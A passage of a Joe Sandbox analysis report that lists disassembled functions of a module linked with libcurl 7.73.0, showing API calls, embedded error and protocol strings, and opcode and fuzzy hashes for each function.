                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast
                                                                                                                                            • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                                                                                                                            • API String ID: 1452528299-1081713384
                                                                                                                                            • Opcode ID: a1c0f06090376b70398dc2d35c350eb24a320076a611897e7808c4d67fb3bd35
                                                                                                                                            • Instruction ID: c635018889f959a71826c450eae27e8457c765f40a9e048a6e16aa5ff32b4265
                                                                                                                                            • Opcode Fuzzy Hash: a1c0f06090376b70398dc2d35c350eb24a320076a611897e7808c4d67fb3bd35
                                                                                                                                            • Instruction Fuzzy Hash: 6491F32268C915DFC6B2855C478496572966F22BC0B094BB6F5038F23BC62ECD671B73
                                                                                                                                            Function 6B7AA820 Relevance: 89.4, APIs: 1, Strings: 50, Instructions: 139COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strncpy
                                                                                                                                            • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                                                                                                                            • API String ID: 2961919466-3442644082
                                                                                                                                            • Opcode ID: afd69d5bb9d34364cc6bc7601e29bf054e434875c87fb88bb1abd9203d7fd474
                                                                                                                                            • Instruction ID: e890ef0616209d629e820664245bb48bcbc03709840955b288fc2d3dd9b85ddb
                                                                                                                                            • Opcode Fuzzy Hash: afd69d5bb9d34364cc6bc7601e29bf054e434875c87fb88bb1abd9203d7fd474
                                                                                                                                            • Instruction Fuzzy Hash: FC414429B8C14A8B86BC081C4B01557B2E66F52A90780DFBAB80CDE250FD5EC9434376
                                                                                                                                            Function 6B79E610 Relevance: 61.7, APIs: 33, Strings: 2, Instructions: 499COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B79E683
                                                                                                                                            • curl_maprintf.LIBCURL(%s?dns=%s,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 6B79E753
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002712,00000000,?,?,?,?,00000000,?,?,?), ref: 6B79E806
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00004E2B,6B79E5E0,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6B79E825
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002711,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6B79E849
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000271F,?), ref: 6B79E86F
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000003C,?), ref: 6B79E88C
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002727,?), ref: 6B79E8A9
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000B5,00000002), ref: 6B79E8C5
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000009B,?), ref: 6B79E8E2
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000029,00000001), ref: 6B79E903
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000063,00000001), ref: 6B79E925
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000E9,00000001), ref: 6B79E94A
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000051,00000002), ref: 6B79E96C
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000F9,00000002), ref: 6B79E991
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000F8,00000001), ref: 6B79E9B6
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002806,?), ref: 6B79E9DB
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002814,?), ref: 6B79EA00
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000105,00000008), ref: 6B79EA32
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002807,?), ref: 6B79EA57
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000040,00000001), ref: 6B79EA79
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000E8,00000001), ref: 6B79EA9E
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002751,?), ref: 6B79EAC3
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002771,?), ref: 6B79EAE8
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000027B9,?), ref: 6B79EB0D
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000AC,00000001), ref: 6B79EB32
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000275C,?), ref: 6B79EB57
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000275D,?), ref: 6B79EB7C
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000D8,00000008), ref: 6B79EBAE
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00004E8C,?), ref: 6B79EBD3
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000277D,?), ref: 6B79EBF8
                                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000283A,?), ref: 6B79EC1D
                                                                                                                                            • curl_multi_add_handle.LIBCURL(?,00000000), ref: 6B79EC4E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_easy_setopt$___from_strstr_to_strchrcurl_maprintfcurl_multi_add_handle
                                                                                                                                            • String ID: %s?dns=%s$Failed to encode DOH packet [%d]
                                                                                                                                            • API String ID: 667061265-3030351490
                                                                                                                                            • Opcode ID: 4879e00ec6e24816643d9dfe39390f424b78f45ba76bed44e36a905fb2adb783
                                                                                                                                            • Instruction ID: 6fb9469e1b9e6ac786b1b1ac8b1b0a3454feb59be1248bfeeed928bde1b4479b
                                                                                                                                            • Opcode Fuzzy Hash: 4879e00ec6e24816643d9dfe39390f424b78f45ba76bed44e36a905fb2adb783
                                                                                                                                            • Instruction Fuzzy Hash: C9F10A71D44219BBEB229A60BF46B9EB7A5BF00750F0502B0FC54BB291D76E8E58C7C1
                                                                                                                                            Function 6B79D000 Relevance: 47.5, APIs: 19, Strings: 8, Instructions: 204COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%5I64d,?,?,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D02A
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D053
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dk,00000000,?,?,?,00000400,00000000,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D065
                                                                                                                                            • __allrem.LIBCMT ref: 6B79D08A
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D098
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D0A8
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dM,00000000,?,?,?,00100000,00000000,00000000,?,00000000,?,00019999,00000000,?), ref: 6B79D0BA
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D0E0
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dM,00000000,?,?,?,00100000,00000000,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D0F2
                                                                                                                                            • __allrem.LIBCMT ref: 6B79D114
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D122
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D132
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dG,00000000,?,?,?,40000000,00000000,00000000,?,00000000,?,06666666,00000000,?), ref: 6B79D144
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D169
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dG,00000000,?,?,?,40000000,00000000,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D17B
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D1A0
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dT,00000000,?,?,?,00000000,00000100,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D1B2
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D1C9
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dP,00000000,?,?,?,00000000,00040000,7C935E00,6B781696,?,6B79D8FE,0B2083C7,00000000,?), ref: 6B79D1DB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf$__allrem
                                                                                                                                            • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                                                                                                                            • API String ID: 3299120379-2102732564
                                                                                                                                            • Opcode ID: 9f0b845441cf1b47ffc9a87c18708b513b9748a98fcc0313dc99656661b8741b
                                                                                                                                            • Instruction ID: 812bc81a8c3946722238cbfd7ad43fbdfc1b8fa48717ed0faee7443c114ec801
                                                                                                                                            • Opcode Fuzzy Hash: 9f0b845441cf1b47ffc9a87c18708b513b9748a98fcc0313dc99656661b8741b
                                                                                                                                            • Instruction Fuzzy Hash: 5041D777BC066436EA3079683E17FAF232DDBC1B68F120469FB14B7181966C691202FD
                                                                                                                                            Function 6B779190 Relevance: 35.3, APIs: 8, Strings: 12, Instructions: 277COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B779245
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B7792AB
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B7792BD
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B7792D1
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B779364
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B779376
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77938A
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77939F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                                            • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.73.0%sQUIT$CLIENT libcurl 7.73.0DEFINE %s %sQUIT$CLIENT libcurl 7.73.0MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                                                                                                                            • API String ID: 601868998-3098048912
                                                                                                                                            • Opcode ID: f56a432ab3238f3329cc66dd0a06b03e6bfd5928b2fe478ce530a00739cb3a7f
                                                                                                                                            • Instruction ID: 66d9631bd6dfb3bdab8129056ab6691be747c1366aee4103109db570cabf9454
                                                                                                                                            • Opcode Fuzzy Hash: f56a432ab3238f3329cc66dd0a06b03e6bfd5928b2fe478ce530a00739cb3a7f
                                                                                                                                            • Instruction Fuzzy Hash: 88712932E0520477DF212A795F46B5E7B688FB2B59F1401F4FD446A383F72E9A1183A2
                                                                                                                                            Function 6B792B70 Relevance: 33.5, APIs: 2, Strings: 17, Instructions: 282COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_slist_free_all.LIBCURL(?,00000000,?,?,multipart/form-data), ref: 6B792B8F
                                                                                                                                            • curl_strequal.LIBCURL(?,attachment,?,?,?,multipart/form-data), ref: 6B792CCC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_slist_free_allcurl_strequal
                                                                                                                                            • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                                                                                                                            • API String ID: 3213019040-1595554923
                                                                                                                                            • Opcode ID: 70ebdaddaecb01392961338a00d8d59be38e9b0b30f5ce2755446c8cc9061def
                                                                                                                                            • Instruction ID: 889170312497e3a0f8900526a1f4c8857ac5e31743cabae14c8abccbe74a2ccc
                                                                                                                                            • Opcode Fuzzy Hash: 70ebdaddaecb01392961338a00d8d59be38e9b0b30f5ce2755446c8cc9061def
                                                                                                                                            • Instruction Fuzzy Hash: A591EFB1A00B019BDB11BE29BF85B4B77F9AF84798B10487DF856DB610E77CE9048B50
                                                                                                                                            Function 6B78AA80 Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 269COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B78AB26
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B78AB3C
                                                                                                                                            • curl_strnequal.LIBCURL(Host:,00000000,00000005), ref: 6B78AC1A
                                                                                                                                            • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B78AC3E
                                                                                                                                            • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B78AC62
                                                                                                                                            • curl_strnequal.LIBCURL(Content-Length:,00000000,0000000F), ref: 6B78AC86
                                                                                                                                            • curl_strnequal.LIBCURL(Connection:,00000000,0000000B), ref: 6B78ACAA
                                                                                                                                            • curl_strnequal.LIBCURL(Transfer-Encoding:,00000000,00000012), ref: 6B78ACCE
                                                                                                                                            • curl_strnequal.LIBCURL(Authorization:,00000000,0000000E), ref: 6B78ACE2
                                                                                                                                            • curl_strnequal.LIBCURL(Cookie:,00000000,00000007,?,?,?,?,?,?,6B78E55E), ref: 6B78ACF6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_strnequal$___from_strstr_to_strchr
                                                                                                                                            • String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:$^xk
                                                                                                                                            • API String ID: 431725195-1624956506
                                                                                                                                            • Opcode ID: 566a2f04eb609772c578bb535d01b36077d0a9a0b9b994c7ada492255c87fb93
                                                                                                                                            • Instruction ID: 494c46c3f793db8fb65e9acfd73a7b18f0a77b2aabf3951fe38b3635e31e2769
                                                                                                                                            • Opcode Fuzzy Hash: 566a2f04eb609772c578bb535d01b36077d0a9a0b9b994c7ada492255c87fb93
                                                                                                                                            • Instruction Fuzzy Hash: 70912371D04241ABEB118F649B48B9E7BB2AF01358F0441F4FC589B2D2E77EDA11CBA1
                                                                                                                                            Function 6B79D510 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 350COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D566
                                                                                                                                            • curl_mfprintf.LIBCURL(89000005,** Resuming transfer from byte position %I64d,00051C86,BF830000,83C70000,00000620,000F4240,00000000,868D0000,6B781696,?), ref: 6B79D59D
                                                                                                                                            • curl_mfprintf.LIBCURL(89000005, %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed,83C70000,00000620,000F4240,00000000,868D0000,6B781696,?), ref: 6B79D5B0
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D5FF
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D623
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D636
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D677
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D6D5
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D702
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D715
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D76F
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D891
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D8A1
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D8C7
                                                                                                                                            • curl_mfprintf.LIBCURL(89000005,%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 6B79D9A1
                                                                                                                                            Strings
                                                                                                                                            • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 6B79D5A5
                                                                                                                                            • ** Resuming transfer from byte position %I64d, xrefs: 6B79D592
                                                                                                                                            • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 6B79D996
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_mfprintf
                                                                                                                                            • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                                                                                                                            • API String ID: 2030109004-664487449
                                                                                                                                            • Opcode ID: dc3cf54614d388647a82eccf9b46fddcdcbcc55b3d652f742d08ef45b0856efd
                                                                                                                                            • Instruction ID: eb27802fd96d0c90516039deeb45553ef704a1580cb42545483a1e99232d3bbc
                                                                                                                                            • Opcode Fuzzy Hash: dc3cf54614d388647a82eccf9b46fddcdcbcc55b3d652f742d08ef45b0856efd
                                                                                                                                            • Instruction Fuzzy Hash: 0DE15C75940708AFEB20AFA4EE84F9EBBB9BF49308F004469F55DA3251DB396940CF14
                                                                                                                                            Function 6B78CF60 Relevance: 31.7, APIs: 3, Strings: 15, Instructions: 245COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_maprintf.LIBCURL(Authorization: Bearer %s,?,?,?,?,?,?,?,?,?), ref: 6B78CFF2
                                                                                                                                            • curl_maprintf.LIBCURL(%s:%s,?,6B7DB98E,?,00000000), ref: 6B78D106
                                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Basic %s,Proxy-,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B78D180
                                                                                                                                              • Part of subcall function 6B7948E0: curl_mvaprintf.LIBCURL(?,?,?,6B7766CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B7948EA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
